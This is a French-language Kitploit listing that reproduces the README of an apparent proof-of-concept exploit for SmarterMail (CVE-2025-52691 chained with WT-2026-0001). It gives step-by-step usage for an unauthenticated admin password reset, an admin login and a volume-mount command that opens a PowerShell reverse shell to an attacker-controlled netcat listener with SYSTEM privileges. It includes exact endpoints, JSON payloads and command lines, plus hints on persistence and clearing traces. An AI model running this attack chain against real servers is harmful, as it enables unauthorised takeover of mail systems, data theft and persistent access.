Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001 — CVE-2025-52691 PoC : Basé sur l'article WT-2026-0001 de watchtowr concernant une exploitation de contournement d'authentification, celui-ci est un script d'attaque Python fonctionnel. | Kitploit
Outils/GitHubGitHub/ninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationRed TeamingOutil d'Accès à Distance
GitHubninjazan420/cve-2025-52691-poc-smartermail-authentication-bypass-exploit-wt-2026-0001

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-52691-PoC-SmarterMail-authentication-bypass-exploit-WT-2026-0001

CVE-2025-52691 PoC : Basé sur l'article WT-2026-0001 de watchtowr concernant une exploitation de contournement d'authentification, celui-ci est un script d'attaque Python fonctionnel.

Voir le dépôt
il y a 6 moisPas encore vérifié

CVE-2025-52691 / WT-2026-0001 - Exploit SmarterMail

🚨 AVIS IMPORTANT

Cet outil est réservé aux tests de sécurité autorisés et à des fins éducatives uniquement !

  • Toute utilisation non autorisée est illégale et contraire à l'éthique
  • Utiliser uniquement sur des systèmes avec autorisation explicite
  • Utilisation à vos propres risques
  • Les utilisateurs sont responsables du respect de toutes les lois applicables

📋 Aperçu

Cet exploit combine deux vulnérabilités critiques dans SmarterMail :

  1. CVE-2025-52691 : Exécution de code à distance sans authentification via téléchargement de fichier
    • Score CVSS : 10.0 (Critique)
    • Versions concernées : Build 9406 et antérieures, Build 16.3.6989.16341 et antérieures
    • Versions corrigées : Build 9413 et ultérieures

https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691

  1. WT-2026-0001 : Contournement d'authentification via réinitialisation de mot de passe
    • Aucun identifiant CVE attribué
    • Versions concernées : Jusqu'au Build 9510
    • Versions corrigées : Build 9511 (15 janvier 2026)

https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/

Vecteur d'attaque

L'exploit réalise une attaque en 3 phases :

  1. Phase 1 : Contournement d'authentification via WT-2026-0001

    • Changer le mot de passe administrateur sans vérification de l'ancien mot de passe
  2. Phase 2 : Connexion administrateur avec le nouveau mot de passe

    • S'authentifier à l'interface Web de SmarterMail
  3. Phase 3 : Exécution de code à distance via la fonctionnalité de montage de volumes

    • Créer un montage de volume avec une commande de shell inversé
    • Exécuter des commandes du système d'exploitation avec les privilèges SYSTEM

Prérequis

Configuration système requise

  • Python 3.6+
  • Netcat (nc)
  • curl
  • Linux/macOS/Windows (WSL)

Instructions d'installation

root@kitploit:~
# Install Python 3 (if not available)
# Ubuntu/Debian
sudo apt update && sudo apt install python3 python3-pip

# macOS
brew install python3

# Windows (WSL)
wsl --install

# Install netcat
# Ubuntu/Debian
sudo apt install netcat

# macOS
brew install netcat

# Windows (WSL)
sudo apt install netcat-traditional

Installer les dépendances

root@kitploit:~
# Python dependencies (if needed)
pip3 install requests

Démarrage rapide

Méthode 1 : Configuration automatisée (recommandée)

root@kitploit:~
# Make executable
chmod +x run_exploit.sh

# Automated setup
./run_exploit.sh --auto

# Or interactive setup
./run_exploit.sh

Méthode 2 : Exécution directe

root@kitploit:~
# Setup listener (in one terminal)
nc -lvnp 4444

# Run exploit (in a second terminal)
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Méthode 3 : Avec toutes les options

root@kitploit:~
python3 exploit.py \
  -H http://192.168.1.100 \
  -P 9998 \
  -A 192.168.1.50 \
  -p 4444 \
  -d \
  --admin-username admin \
  --new-password "MySecurePassword123!"

Instructions détaillées

Étape 1 : Préparation

  1. Identification de la cible

    root@kitploit:~
    # Check target host
    curl -I http://192.168.1.100:9998
    
    # Identify SmarterMail version
    # (Usually in login page or HTTP headers)
    
  2. Configuration de l'écouteur

    root@kitploit:~
    # In Terminal 1: Start listener
    nc -lvnp 4444
    
    # The listener must be running before the exploit is executed
    
  3. Validation réseau

    root@kitploit:~
    # Ensure connection between attacker and target is possible
    ping 192.168.1.100
    nc -zv 192.168.1.100 9998
    

Étape 2 : Exécution de l'exploit

root@kitploit:~
# With the runner script (recommended)
./run_exploit.sh

# Or directly with Python
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Étape 3 : Après l'exploit

  1. Connexion au shell

    root@kitploit:~
    # In the listener terminal, a connection should now appear
    # You should have a SYSTEM shell
    
  2. Vérifier l'accès

    root@kitploit:~
    # In the obtained shell
    whoami
    hostname
    ipconfig /all  # Windows
    ifconfig       # Linux
    
  3. Accès persistant

    root@kitploit:~
    # Optional: Set up persistence
    # Windows: Install as service
    # Linux: Cron job or systemd service
    

🔧 Options de configuration

Paramètres de Exploit.py

Paramètres de Run_Exploit.sh


Exemples

Exemple 1 : Utilisation de base

root@kitploit:~
# Terminal 1: Start listener
nc -lvnp 4444

# Terminal 2: Run exploit
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444

Exemple 2 : Avec des identifiants personnalisés

root@kitploit:~
python3 exploit.py \
  -H https://mail.company.com \
  -P 443 \
  -A 10.0.0.1 \
  -p 8080 \
  --admin-username administrator \
  --new-password "ComplexPassword123!@#"

Exemple 3 : Mode débogage

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

Exemple 4 : Configuration automatisée

root@kitploit:~
./run_exploit.sh --auto

Détails techniques

Phase 1 : Contournement d'authentification

Point de terminaison : POST /api/v1/auth/force-reset-password

Charge utile :

root@kitploit:~
{
  "IsSysAdmin": "true",
  "OldPassword": "dummy",
  "Username": "admin",
  "NewPassword": "NewPassword123!@#",
  "ConfirmPassword": "NewPassword123!@#"
}

Réponse en cas de succès :

root@kitploit:~
{
  "success": true,
  "resultCode": 200,
  "debugInfo": "check1\r\ncheck2\r\ncheck3\r\ncheck4.2\r\ncheck5.2\r\ncheck6.2\r\ncheck7.2\r\ncheck8.2\r\n"
}

Phase 2 : Connexion administrateur

Point de terminaison : POST /api/v1/auth/login

Charge utile :

root@kitploit:~
{
  "username": "admin",
  "password": "NewPassword123!@#"
}

Phase 3 : Exécution de code à distance via montage de volumes

Point de terminaison : POST /api/v1/settings/volume-mounts

Charge utile :

root@kitploit:~
{
  "name": "random_volume_name",
  "path": "C:\\Temp\\random_volume_name",
  "command": "powershell reverse shell command",
  "enabled": true,
  "type": "command"
}

Dépannage

Problèmes courants

1. Port bloqué

root@kitploit:~
# Error: "Connection refused"
# Solution: Check firewall and open port
sudo ufw allow 9998

2. Écouteur inaccessible

root@kitploit:~
# Error: "Connection failed"
# Solution: Check listener setup
nc -lvnp 4444

3. Échec de l'authentification

root@kitploit:~
# Error: "Login failed"
# Solution: Check target version (must be vulnerable)

5. Échec de l'exécution de code à distance

root@kitploit:~
# Error: "Volume mount creation failed"
# Solution: Check admin privileges, target system

Mode débogage

Activez le mode débogage pour une sortie détaillée :

root@kitploit:~
python3 exploit.py -H http://192.168.1.100 -P 9998 -A 192.168.1.50 -p 4444 -d

⚠️ Notes de sécurité

Aspects juridiques

  • Effectuer uniquement des tests autorisés
  • Obtenir une autorisation écrite
  • Assurer la conformité avec les lois locales
  • Aucun test sur les systèmes de production

Précautions de sécurité

  1. Environnement de test : Toujours tester dans des environnements contrôlés
  2. Validation de la cible : S'assurer que la cible est un système de test
  3. Isolement réseau : Séparer les systèmes de test du réseau de production
  4. Documentation : Documenter tous les tests
  5. Nettoyage : Supprimer toutes les traces après les tests

Utilisation responsable

  • Ne pas causer de dommages
  • Ne pas voler ou manipuler des données
  • Ne pas désactiver les systèmes
  • Être transparent envers les parties responsables

Mises à jour et maintenance

Notes de version

  • v1.0 : Version initiale avec toutes les fonctionnalités
  • Mises à jour futures : Améliorations de la gestion des erreurs et de la stabilité

🙏 Remerciements

  • watchTowr Labs pour la recherche originale
  • Communauté de recherche en sécurité pour le soutien
  • Tous ceux qui ont contribué aux améliorations

⚠️ Rappelez-vous : Un grand pouvoir implique de grandes responsabilités !

Télécharger l’outil
ParamètreDescriptionValeur par défaut
-H, --hostHôte cible (obligatoire)-
-P, --portPort cible9998
-A, --attacker-ipIP de l'attaquant pour le shell inversé (obligatoire)-
-p, --attacker-portPort de l'attaquant pour le shell inversé (obligatoire)-
-d, --debugActiver le mode débogageFalse
--admin-usernameNom d'utilisateur administrateuradmin
--new-passwordNouveau mot de passe administrateurNewPassword123!@#
ParamètreDescription
-t, --targetHôte cible
-p, --portPort cible
-a, --attacker-ipIP de l'attaquant
-l, --listener-portPort de l'écouteur
-n, --new-passwordNouveau mot de passe administrateur
-u, --admin-userNom d'utilisateur administrateur
-d, --debugMode débogage
--autoMode automatisé